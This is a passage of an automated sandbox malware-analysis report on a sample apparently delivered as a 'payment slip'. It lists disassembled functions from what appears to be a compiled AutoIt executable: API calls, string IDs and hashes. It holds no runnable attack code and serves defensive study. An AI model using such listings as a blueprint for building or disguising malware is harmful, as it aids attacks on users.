                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000C11ED
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C120B
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C121D
                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 000C1232
                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 000C1245
                                        • IsWindowVisible.USER32(00000000), ref: 000C12A1
                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 000C12BC
                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 000C12D0
                                        • GetWindowRect.USER32(00000000,?), ref: 000C12E8
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 000C130E
                                        • GetMonitorInfoW.USER32(00000000,?), ref: 000C1328
                                        • CopyRect.USER32(?,?), ref: 000C133F
                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 000C13AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: 4783d556c4735a6cd596822aac5b6f5db8ea4c01ce55ba74044ed1ef4784eb78
                                        • Instruction ID: 583ff4e4d209f3c7b39da738ba360cc94d4f103e2d1c4e01fd9bffe855240aa2
                                        • Opcode Fuzzy Hash: 4783d556c4735a6cd596822aac5b6f5db8ea4c01ce55ba74044ed1ef4784eb78
                                        • Instruction Fuzzy Hash: E9B17971608341AFE754DF64C984FAEBBE4EF85354F00891CF9999B2A2C771E844CB92
                                        Function 000C0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 000C02E5
                                        • _wcslen.LIBCMT ref: 000C031F
                                        • _wcslen.LIBCMT ref: 000C0389
                                        • _wcslen.LIBCMT ref: 000C03F1
                                        • _wcslen.LIBCMT ref: 000C0475
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 000C04C5
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000C0504
                                          • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                          • Part of subcall function 0009223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00092258
                                          • Part of subcall function 0009223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0009228A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 1103490817-719923060
                                        • Opcode ID: 34ff098c18a4279891e6849fd297310360746085db5f4c847ad64f49d454ff59
                                        • Instruction ID: f6c12ee4ae517cdf41a5cddee91d79002ff1185d3080e4df25c9649689fa57b7
                                        • Opcode Fuzzy Hash: 34ff098c18a4279891e6849fd297310360746085db5f4c847ad64f49d454ff59
                                        • Instruction Fuzzy Hash: 6EE19D71208601DBCB24DF24C551E7EB3E5BF88314F54496CF99A9B6A2DB30ED45CB82
                                        Function 00048891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00048968
                                        • GetSystemMetrics.USER32(00000007), ref: 00048970
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0004899B
                                        • GetSystemMetrics.USER32(00000008), ref: 000489A3
                                        • GetSystemMetrics.USER32(00000004), ref: 000489C8
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000489E5
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000489F5
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00048A28
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00048A3C
                                        • GetClientRect.USER32(00000000,000000FF), ref: 00048A5A
                                        • GetStockObject.GDI32(00000011), ref: 00048A76
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00048A81
                                          • Part of subcall function 0004912D: GetCursorPos.USER32(?), ref: 00049141
                                          • Part of subcall function 0004912D: ScreenToClient.USER32(00000000,?), ref: 0004915E
                                          • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000001), ref: 00049183
                                          • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                        • SetTimer.USER32(00000000,00000000,00000028,000490FC), ref: 00048AA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: d3ff73f02ae6353e1c4a30d9d80a60c3ff4733ea924db5dc4b9110b89d541bce
                                        • Instruction ID: c7dd7c9e7d2c053a71ae1f9d1ce0314c0c1da3cc987d3d7e30c8f0ae1640681a
                                        • Opcode Fuzzy Hash: d3ff73f02ae6353e1c4a30d9d80a60c3ff4733ea924db5dc4b9110b89d541bce
                                        • Instruction Fuzzy Hash: 7EB19E71A00209EFEB14DFA8CD45FAE3BB5FB48314F118229FA55A7290DB74E841CB55
                                        Function 00090D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                          • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                          • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                          • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                          • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090DF5
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090E29
                                        • GetLengthSid.ADVAPI32(?), ref: 00090E40
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00090E7A
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090E96
                                        • GetLengthSid.ADVAPI32(?), ref: 00090EAD
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090EB5
                                        • HeapAlloc.KERNEL32(00000000), ref: 00090EBC
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090EDD
                                        • CopySid.ADVAPI32(00000000), ref: 00090EE4
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090F13
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090F35
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090F47
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F6E
                                        • HeapFree.KERNEL32(00000000), ref: 00090F75
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F7E
                                        • HeapFree.KERNEL32(00000000), ref: 00090F85
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F8E
                                        • HeapFree.KERNEL32(00000000), ref: 00090F95
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00090FA1
                                        • HeapFree.KERNEL32(00000000), ref: 00090FA8
                                          • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                          • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                          • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: dfad3d31c0851d7322c708b073b44debc4897e4e52087dd29384a697bb5b9cf5
                                        • Instruction ID: 8aa25acf5d8b18ff0e564f04a6c7e099aa5fbe87e547e95e3cfe678029aad0e0
                                        • Opcode Fuzzy Hash: dfad3d31c0851d7322c708b073b44debc4897e4e52087dd29384a697bb5b9cf5
                                        • Instruction Fuzzy Hash: 7171487290020AAFEF60DFA5DC48FEEBBB8FF05310F148125F919A6191D7759A05DB60
                                        Function 000BC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BC4BD
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,000CCC08,00000000,?,00000000,?,?), ref: 000BC544
                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 000BC5A4
                                        • _wcslen.LIBCMT ref: 000BC5F4
                                        • _wcslen.LIBCMT ref: 000BC66F
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 000BC6B2
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 000BC7C1
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 000BC84D
                                        • RegCloseKey.ADVAPI32(?), ref: 000BC881
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000BC88E
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 000BC960
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 9721498-966354055
                                        • Opcode ID: 8e489bba92ff70c9b4b99af9bb48023f7c43bc32a4f657935b35e4f6f3911155
                                        • Instruction ID: 9904c0e25ffc63980de01a3d473094635280f5632f521ee044f8dd8b57e3d3db
                                        • Opcode Fuzzy Hash: 8e489bba92ff70c9b4b99af9bb48023f7c43bc32a4f657935b35e4f6f3911155
                                        • Instruction Fuzzy Hash: C1127A756046019FEB25DF14C881FAAB7E5EF88314F14885DF88A9B3A2DB71ED41CB81
                                        Function 000C091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 000C09C6
                                        • _wcslen.LIBCMT ref: 000C0A01
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C0A54
                                        • _wcslen.LIBCMT ref: 000C0A8A
                                        • _wcslen.LIBCMT ref: 000C0B06
                                        • _wcslen.LIBCMT ref: 000C0B81
                                          • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                          • Part of subcall function 00092BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00092BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 1103490817-4258414348
                                        • Opcode ID: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                        • Instruction ID: 96468690354b633e399678357ec144fed286cec19ee39adced017b4ab1ca3574
                                        • Opcode Fuzzy Hash: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                        • Instruction Fuzzy Hash: 03E18771208701DFCB24DF28C450A6EB7E1BF98314F50895CF89A9B2A2DB31ED45CB82
                                        Function 000BC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 1256254125-909552448
                                        • Opcode ID: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
                                        • Instruction ID: cc50837bd8fa4fe2cc758f67efca6daf17908fa968abcabef797570c03e6a215
                                        • Opcode Fuzzy Hash: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
                                        • Instruction Fuzzy Hash: 3971E33260412A8BEB20DE6CCD51DFF37D5ABA0758F250528FC56AB285EB35CD8493A1
                                        Function 000C833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 000C835A
                                        • _wcslen.LIBCMT ref: 000C836E
                                        • _wcslen.LIBCMT ref: 000C8391
                                        • _wcslen.LIBCMT ref: 000C83B4
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000C83F2
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,000C5BF2), ref: 000C844E
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8487
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 000C84CA
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8501
                                        • FreeLibrary.KERNEL32(?), ref: 000C850D
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000C851D
                                        • DestroyIcon.USER32(?,?,?,?,?,000C5BF2), ref: 000C852C
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000C8549
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000C8555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 799131459-1154884017
                                        • Opcode ID: 3033e41d793cea387a0ba9e4b574ff0e6e7e984263a448e8d12e5ad43860c4e1
                                        • Instruction ID: ceb61e8e9e86e896e5715c0995d8f867c6aa8afe864be9a70c69cf587b5ef2fd
                                        • Opcode Fuzzy Hash: 3033e41d793cea387a0ba9e4b574ff0e6e7e984263a448e8d12e5ad43860c4e1
                                        • Instruction Fuzzy Hash: 5D61D171940619BEEB18DF64CC45FFF77A8BB08711F10860AF915D60D1DBB4AA80DBA4
                                        Function 00037778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 0-1645009161
                                        • Opcode ID: 30ddd578247413cc44fbf38c881455578d62529b182f5ad21c2a7d12e2afae74
                                        • Instruction ID: 96503aedd970be57e21e7a00b84a75f541771ce2868925fed27a15c104ac1911
                                        • Opcode Fuzzy Hash: 30ddd578247413cc44fbf38c881455578d62529b182f5ad21c2a7d12e2afae74
                                        • Instruction Fuzzy Hash: 6C81D3B1A44605BBEB72AF60CC42FEF37A9AF15301F048025FD09AA193EBB4D915C795
                                        Function 00095A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 00095A2E
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00095A40
                                        • SetWindowTextW.USER32(?,?), ref: 00095A57
                                        • GetDlgItem.USER32(?,000003EA), ref: 00095A6C
                                        • SetWindowTextW.USER32(00000000,?), ref: 00095A72
                                        • GetDlgItem.USER32(?,000003E9), ref: 00095A82
                                        • SetWindowTextW.USER32(00000000,?), ref: 00095A88
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00095AA9
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00095AC3
                                        • GetWindowRect.USER32(?,?), ref: 00095ACC
                                        • _wcslen.LIBCMT ref: 00095B33
                                        • SetWindowTextW.USER32(?,?), ref: 00095B6F
                                        • GetDesktopWindow.USER32 ref: 00095B75
                                        • GetWindowRect.USER32(00000000), ref: 00095B7C
                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00095BD3
                                        • GetClientRect.USER32(?,?), ref: 00095BE0
                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00095C05
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00095C2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                        • String ID:
                                        • API String ID: 895679908-0
                                        • Opcode ID: 93669f4a4ab738afc8838e1fd914c57a77eaa2159f54256c3f6d0775abe0fc62
                                        • Instruction ID: 1b58f1f282af208c50752b52f9613cb2fa7c6c0e59fb3bee1cbc0b8961292a0b
                                        • Opcode Fuzzy Hash: 93669f4a4ab738afc8838e1fd914c57a77eaa2159f54256c3f6d0775abe0fc62
                                        • Instruction Fuzzy Hash: 27719D31900B09AFEF21DFA9CE85EAEBBF5FF48705F104518E586A25A0D774E940DB10
                                        Function 000500C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                        Download Yara Rule
                                        APIs
                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000500C6
                                          • Part of subcall function 000500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0010070C,00000FA0,E6C5484A,?,?,?,?,000723B3,000000FF), ref: 0005011C
                                          • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000723B3,000000FF), ref: 00050127
                                          • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000723B3,000000FF), ref: 00050138
                                          • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0005014E
                                          • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0005015C
                                          • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0005016A
                                          • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00050195
                                          • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000501A0
                                        • ___scrt_fastfail.LIBCMT ref: 000500E7
                                          • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
                                        Strings
                                        • InitializeConditionVariable, xrefs: 00050148
                                        • WakeAllConditionVariable, xrefs: 00050162
                                        • SleepConditionVariableCS, xrefs: 00050154
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00050122
                                        • kernel32.dll, xrefs: 00050133
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 66158676-1714406822
                                        • Opcode ID: ff2c684f5de50e788797c777db8796feb70df2f52562a5ceee2ba67bbd61253a
                                        • Instruction ID: 438259a4b90587379473f0c1f868b7e4cee06e2c7af3a0c031e7d4f76f997313
                                        • Opcode Fuzzy Hash: ff2c684f5de50e788797c777db8796feb70df2f52562a5ceee2ba67bbd61253a
                                        • Instruction Fuzzy Hash: 93214672A41B016BF7115B64EC06F7F33D5EB05B62F04013AFD46A66D2DFB89C048A9A
                                        Function 000930F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
